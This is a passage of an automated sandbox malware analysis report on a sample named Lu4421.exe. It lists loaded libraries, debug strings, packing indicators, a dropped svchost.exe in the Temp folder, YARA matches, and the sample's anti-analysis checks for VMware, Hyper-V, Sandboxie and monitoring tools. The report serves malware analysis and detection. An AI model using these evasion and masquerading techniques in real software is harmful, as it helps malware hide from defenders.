                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Lu4421.exeStatic file information: File size 5865472 > 1048576
                        Source: Lu4421.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x394000
                        Source: Lu4421.exeStatic PE information: Raw size of iubcysyr is bigger than: 0x100000 < 0x1ff400
                        Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Management.pdbHl source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.costura.pdb.compressed source: Lu4421.exe
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: !costura.polly.core.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: Lu4421.exe
                        Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressed source: Lu4421.exe
                        Source: Binary string: re.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\Desktop\Lu4421.PDB source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceProcess.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.pdb:l source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: Lu4421.exe, 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                        Source: Binary string: mscorlib.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.ServiceProcess.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Lu4421.exe
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.core.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Xml.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.pdbpHN source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Xml.pdb* source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: Lu4421.exe
                        Source: Binary string: System.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.wpf.ui.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: Lu4421.exe, Lu4421.exe, 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                        Source: Binary string: System.Net.Http.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Configuration.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: PresentationFrameworkib.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C880000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: Lu4421.exe
                        Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: Lu4421.exe
                        Source: Binary string: mscorlib.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp, WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Net.Http.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Management.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Management.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.pdb source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp, WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: Lu4421.exe
                        Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: Lu4421.exe
                        Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: Lu4421.exe
                        Source: Binary string: System.Core.pdbk source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr

Data Obfuscation

Source: C:\Users\user\Desktop\Lu4421.exe | Unpacked PE file: 0.2.Lu4421.exe.b50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iubcysyr:EW;tpxtcrvz:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: Yara match | File source: Lu4421.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
Source: Lu4421.exe | Static PE information: 0xFFBE84BF [Sat Dec 19 14:25:03 2105 UTC]
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: svchost.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1bab2
Source: Lu4421.exe | Static PE information: real checksum: 0x5a3d95 should be: 0x5a3f7c
Source: Lu4421.exe | Static PE information: section name:
Source: Lu4421.exe | Static PE information: section name: .idata
Source: Lu4421.exe | Static PE information: section name:
Source: Lu4421.exe | Static PE information: section name: iubcysyr
Source: Lu4421.exe | Static PE information: section name: tpxtcrvz
Source: Lu4421.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_011AAE84 push rdx; retf 0_2_011AB271
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_011AC0A0 push rcx; retf 0_2_011AC184
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_00007FFD9B7F23B0 push eax; iretd 0_2_00007FFD9B7F24A1
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_00007FFD9B7F2490 push eax; iretd 0_2_00007FFD9B7F24A1
Source: C:\Users\user\Desktop\Lu4421.exe | Code function: 0_2_00007FFD9B7F00AD pushad ; iretd 0_2_00007FFD9B7F00C1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 1_2_00007FFD9B7D77DD push ecx; retf 1_2_00007FFD9B7D785C

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Lu4421.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe

Boot Survival

Source: Yara match | File source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: C:\Users\user\Desktop\Lu4421.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\Lu4421.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\Lu4421.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\Lu4421.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\Lu4421.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\Lu4421.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\Lu4421.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Lu4421.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe -- Process information set: NOOPENFILEERRORBOX (51 identical entries)
Source: C:\Windows\System32\WerFault.exe -- Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
Source: C:\Windows\System32\WerFault.exe -- Process information set: NOOPENFILEERRORBOX (51 identical entries)

                        Malware Analysis System Evasion

Source: Yara match -- File source: Lu4421.exe, type: SAMPLE
Source: Yara match -- File source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
Source: Yara match -- File source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
Source: Yara match -- File source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
Source: Yara match -- File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\svchost.exe -- WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\Lu4421.exe -- WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController (4 queries; one spells the namespace root\cimv2)
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: SBIEDLL.DLL
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.dr -- Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
Source: C:\Users\user\Desktop\Lu4421.exe -- Special instruction interceptor: First address: 12129DF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Lu4421.exe -- Memory allocated: 15B625A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Lu4421.exe -- Memory allocated: 15B7C2B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe -- Memory allocated: 31A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost.exe -- Memory allocated: 1B1A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Lu4421.exe -- Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc (the display-adapter device class; DriverDesc is the adapter name, the same information as the Win32_VideoController queries above)
Source: C:\Users\user\Desktop\Lu4421.exe -- Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\Lu4421.exe -- Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\Lu4421.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Lu4421.exe -- Thread delayed: delay time: 597984
Source: C:\Users\user\Desktop\Lu4421.exe -- Thread delayed: delay time: 597875
Source: C:\Users\user\AppData\Local\Temp\svchost.exe -- Thread delayed: delay time: 922337203685477
Note: a delay of 922337203685477 ms is the infinite timeout (0x8000000000000000 in 100 ns units, what Sleep(INFINITE) passes to NtDelayExecution) converted to milliseconds, so those threads are parked for good rather than delayed for a finite time. The ">= -30000s" and "> 30" annotations below are the report's own cut-offs for flagging sleep-based evasion.
Source: C:\Users\user\Desktop\Lu4421.exe -- Window / User API: threadDelayed 1351
Source: C:\Users\user\Desktop\Lu4421.exe -- Window / User API: threadDelayed 5560
Source: C:\Users\user\AppData\Local\Temp\svchost.exe -- Window / User API: threadDelayed 9689
Source: C:\Users\user\Desktop\Lu4421.exe TID: 6764 -- Thread sleep count: 195, 185, 221, 159, 121, 135 (each > 30)
Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144 -- Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Users\user\Desktop\Lu4421.exe TID: 7160 -- Thread sleep count: 1351 > 30; 5560 > 30
Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144 -- Thread sleep time: -597984s, -597875s, -100000s, -99875s, -99766s, -99656s, -99546s, -99435s, -99257s, -99142s, -99016s, -98906s, -98797s, -98688s (each >= -30000s)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 5924 -- Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 1376 -- Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Desktop\Lu4421.exe -- WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\Lu4421.exe -- WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor (2 queries)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe -- File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Lu4421.exe -- Thread delayed: delay time: 922337203685477, 597984, 597875, 100000, 99875, 99766, 99656, 99546, 99435, 99257, 99142, 99016, 98906, 98797, 98688
Source: C:\Users\user\AppData\Local\Temp\svchost.exe -- Thread delayed: delay time: 922337203685477
Note: the Amcache.hve.4.dr entries below come from the Windows Amcache hive written during the run (an application-compatibility hive that Windows maintains, most likely copied by WerFault.exe during crash reporting); they describe the analysis VM's own VMware hardware and are not checks the sample performs. The Lu4421.exe and svchost.exe entries are strings in the sample's memory: Hyper-V integration service names (vmicshutdown, vmicvss, vmicheartbeat and the "Hyper-V ... Service" display names) and display-adapter names (vmware svga 3d, Microsoft Hyper-V Video) that it compares against.
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Hyper-V Data Exchange Service0
Source: Amcache.hve.4.dr -- Binary or memory string: VMware
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64421000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: microsoft hyper-v video
Source: Amcache.hve.4.dr -- Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 00000001.00000002.2956529372.000000001D126000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2956620545.000000001D12C000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64421000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: vmware svga 3d
Source: Amcache.hve.4.dr -- Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr -- Binary or memory string: vmci.sys
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: !Hyper-V PowerShell Direct Service0
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64404000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64421000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B643CE000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Microsoft Hyper-V Video
Source: Lu4421.exe -- Binary or memory string: vmicshutdown
Source: Lu4421.exe -- Binary or memory string: vmware
Source: svchost.exe, 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW@V
Source: Amcache.hve.4.dr -- Binary or memory string: VMware20,1
Source: Lu4421.exe -- Binary or memory string: vmicvss
Source: Amcache.hve.4.dr -- Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr -- Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr -- Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr -- Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr -- Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr -- Binary or memory string: VMware PCI VMCI Bus Device
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Hyper-V Guest Service Interface0
Source: Amcache.hve.4.dr -- Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr -- Binary or memory string: VMware Virtual RAM
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: $Hyper-V Volume Shadow Copy Requestor0
Source: Amcache.hve.4.dr -- Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Lu4421.exe -- Binary or memory string: vmicheartbeat
Source: Amcache.hve.4.dr -- Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr -- Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr -- Binary or memory string: vmci.syshbin
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: -Hyper-V Remote Desktop Virtualization Service0
Source: Amcache.hve.4.dr -- Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr -- Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr -- Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr -- Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Hyper-V Guest Shutdown Service0
Source: Amcache.hve.4.dr -- Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Lu4421.exeBinary or memory string: VirtualMachine:
                        Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Lu4421.exe, 00000000.00000002.2047374086.0000015B7C784000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
